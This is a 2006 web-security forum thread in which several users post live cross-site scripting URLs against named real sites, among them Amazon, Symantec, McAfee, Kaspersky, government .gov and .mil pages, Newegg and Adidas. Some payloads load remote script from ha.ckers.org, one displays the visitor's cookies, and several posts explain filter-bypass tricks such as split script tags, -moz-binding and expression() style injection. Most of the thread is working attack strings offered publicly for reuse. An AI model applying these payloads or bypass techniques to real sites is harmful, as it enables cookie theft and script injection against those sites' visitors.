I reported xss in myheadlines phpnuke module, yet it's still live on some places:

http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474

thomaspollet Wrote:
-------------------------------------------------------
> I reported xss in myheadlines phpnuke module, yet
> it's still live on some places:
>
> http://cccure.org/modules.php?op=modload&name=MyHe
> adlines&file=index&myh=user&myh_op=show_all%22%3E%
> 3Cscript%3Ealert(2)%3C/script%3E&eid=2474

That's because people have to update their nuke. The phpnuke.org search hole should have been fixed by now, because I remember being able to do the IFrame in 7.9 when it was posted on waraxe's site, and they released 8.0 (which they're using on their site) a while ago.



Edited 1 time(s). Last edit at 09/29/2006 12:48PM by Ghozt.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://linksys.com/servlet/Satellite?email=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&temp_email=&passcode='';!--&tenp_passcode='';!--&fieldsOnForm=email,passcode,&mag=&submitType=done&SubmittedElement=Linksys/ProductReg/CustomerLogin&childpagename=US/Layout&packedargs=siteid%3D1115416834707%26lang%3Den%26site%3DUS%26cid%3D1115416906014%26c%3DL_Content_C1&pagename=Linksys/Common/VisitorWrapper&FormName=reg&Attachment=false - Linksys.com
http://www.thawte.com/ucgi/search.cgi?menu1=make+your+selection+%3E%3E&Search=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&x=3&y=5
Look at what is suposedly ignored.




Edited 2 time(s). Last edit at 09/29/2006 02:10PM by Ghozt.

http://www.certicom.com/index.php?keywords=asdf%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&Submit=Submit&action=res%2Csearch_site

-maluc

http://search4.unisys.com/especific/search_results.asp?qstr=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&totDocs=0&totFtDocs=0&qryoption=allofthewords&extension=&changeDisplay=0&qstrTemp=asdf%27e&SiteToSearch=http%3A%2F%2Fwww.unisys.com%2Fabout__unisys%2F*&section=&Search=Search&summ=detailed&docsPP=20&s=&se=&b=about__unisys&p=3&e=none&sf=corporate&ci=about__unisys&ce=company__profile

-maluc

http://app.subscribermail.com/add_mail.cfm?optinparam=redirectwelcome&ovr_redirection_url=http%3A%2F%2Fwww.trustestage.com%2Fsubconfirm.html&ppid=TRUSD6C93DDB&version=v3&email=XSS%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&mailtype=1&Submit=Submit - TRUSTe newsletter.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.truste.org/pvr.php%3fpage=complaint&PHPSESSID=3e5f80c5ff71a277bc238b19d650ad22&url=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&_submit=Next - Yet another TRUSTe.



Edited 1 time(s). Last edit at 09/29/2006 03:00PM by Ghozt.

I'm not sure what the web designer was thinking for this, but it doesn't filter any input.. *unless* you include <script> or </script> .. then it filters it all. But my guess is they got too many complaints from people named O'Brien showing up as O\'Brien ..

Potentially a very exploitable hole for fun and profit. _-_

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://zme.amazon.com/exec/varzea/fx-register/process-login/102-5551194-3126502&login-customer=existing&login-email=XSSman&input-login-email=%22%3E%3CBODY+ONLOAD%3D'a=%22Your%20Cookies:%5Cn%5Cn%5Cn%22%2Bdocument.cookie;alert%28a%29'%3E%3Cx%20+&input-login-customer=existing&password=&x=0&y=0 zme.amazon.com

-maluc

http://www.afpc.randolph.af.mil/external.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=Weapons%20of%20Mass%20Destruction%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

http://ohrm.os.doc.gov/search/index.htm?ssUserText=Osama+Bin+Laden%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+

-maluc

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.geeksquad.com/email/HighLevel.php&email=XSSman<script>alert(%22XSS%22)</script>&Sign+Up.x=0&Sign+Up.y=0&Sign+Up=Sign+Up geeksquad.com

-maluc

http://www.compusa.com/products/products.asp?N=0&Ntt=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Ntk=All&Nty=1&D=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Dx=mode%20matchall

-maluc

Heh, here's a funny example of when two filters work against each other. it doesn't filter out ' " > < .. they may need them for their encoded tracking numbers. (the form checks your order status). Instead they filter out all <script* and </script* and go to an error page. That's easy enough to get around with a <body onload=alert()>

The second filter erases all spaces though, since tracking numbers have none. This turns the workaround into <bodyonload=alert()>. That eliminates every other vector i know of. Except, now it bypassed the first filter:
<scr ipt>alert()</scr ipt>
will now execute when spaces are removed ^^

ironically, switching the order of the filters would be an almost effective filter (except for style="bind/expression")

http://www.newegg.com/CustomerService/TrackOrder.asp?TrackingNumber=+XSSman%22%3E%3Cscr+ipt%3Ealert%28%22XSS%22%29%3C%2Fscr+ipt%3E%3Cx&Action=NEW

-maluc

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.techpowerup.org/upload.php&MAX_FILE_SIZE=2097152&file=&url=http://asdf%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&resize=0&dx=0&dy=0&watermark=9&tagline=&font=arial&textcol=%2523000000&size=12&bgcol=%2523FFFFFF&bgalpha=20&tagpos=1 techpowerup.com .. unfiltered php error

-maluc

Hah. That's quite neat actually.

- Kyran

http://www.frozencpu.com/process?mv_session_id=tdVJ23D9&mv_nextpage=problem&mv_form_profile=check_problem&mv_todo=return&p_fname=XSSman+for+ff%22+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29&p_lname=XSSman+for+ie%22+style%3D%27xx%3Aexpression%28alert%28%22XSS%22%29%29%27&p_email=&p_subject=&p_category=general&p_comments=%0D%0A&mv_click_map=Send&mv_click_Send=Send

filters by deleting the < .. so used parameter injection

anyone know of an injection like these two for autoexecuting in opera? it only has 1% market share.. but still nice for completion.

firefox: style=-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')
ie: style="expression(alert('XSS'))"

-maluc



Edited 1 time(s). Last edit at 09/29/2006 07:41PM by maluc.

http://searchg.symantec.com/search?q=%22%3Balert%28%27xss%27%29%3Bs.prop5%3D%22&site=symc_en_US&btnG.x=0&btnG.y=0&btnG=OK&hitsceil=100&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&client=symc_en_US&charset=utf-8&context=gbh&y=0&oe=UTF-8&ie=UTF-8&proxystylesheet=symc_en_US&x=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://odds.proboards24.com/index.cgi?action=register2&username=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E <-- any proboards forum.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

heh, symantec.. good job

-maluc

http://www.tv/en-def-8b35e4129716/cgi-bin/multilookup.cgi?domain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&tld=tv&x=0&y=0

http://knowledge.mcafee.com/SupportSite/search.do?languages=XSSman'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&rwTarget=%2FrfPlayerWidget.do&searchMode=GuidedSearch&searchString=&product=hhhhh&document=&cmd=search&productFamily=&contextType=gs

as far as i can see, it's an unused field, so overlooked for filtering _-_

-maluc

in case symantec and mcafee were lonely https://www.zonelabs.com/store/application?namespace=zls_user&origin=login.jsp&event=button.login&zl_user_name=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&destination=global.jsp&zl_user_password=&x=0&y=0

-maluc

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://reg.imageshack.us/content.php?page=email&name=Null&email=XSS%22%3E%3Cscript%20src=http://ha.ckers.org/xss.jpg%20@null.org&subj=XML+API+Request&corresp=Partnerships&idea=Null&ip=0.0.0.0&q=marketing - imageshack.us

nice find guys. must be all teh honeypots.

anyways - i going away for a few days so don't think i have finished just yet becuase i ain't posting.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

I sure wish acunetix would take down the honeypot on their main page. :(
C-ya when you get back digital. I'm leaving for california on Monday myself.

http://usa.kaspersky-labs.com/trials/trialsregHOME.php?aw=Trials+Page&ref=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&chapter=146481750
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://usa.kaspersky-labs.com/trials/trials_postHOME.php&oid=00D300000000WYS&retURL=http%3A%2F%2Fusa.kaspersky-labs.com%2Ftrials%2Ftrial_thanks.php&Campaign_ID=Campaign_Adwords&aw=Trials+Page&ref=%5C&chapter=146481750&email=XSSman%22><script>alert(String.fromCharCode(88,83,83))</script>@dev.null&Submit.x=0&Submit.y=0&Submit=Submit&optin=yes also usa.kaspersky-labs.com

-maluc

http://adidas.com - adidas.com/us/shared/help/help_contact-us.asp?strCountry=us&strBrand="/>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
http://dictionary.com - dictionary.reference.com/search?q=%22';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}&x=0&y=0

I can't get it to post right maluc, see if you can try. It cuts off at the first //\.



Edited 14 time(s). Last edit at 09/29/2006 10:46PM by Ghozt.

ghozt, you have to hex encode somes of the characters for the script here.. especially " to %22

and: { to %7B .. } to %7D .. + to %2B .. i think thats all of them

-maluc

disclosed by Ghozt, just click-friendly:
http://www.adidas.com/us/shared/legal.asp?strCountry=us&strBrand=%22);alert(%22XSS%22)%3C/SCRIPT%3E<x
http://dictionary.reference.com/search?q=';alert(%22XSS%22);x='&x=0&y=0

-maluc

Ah. Thanks maluc. :)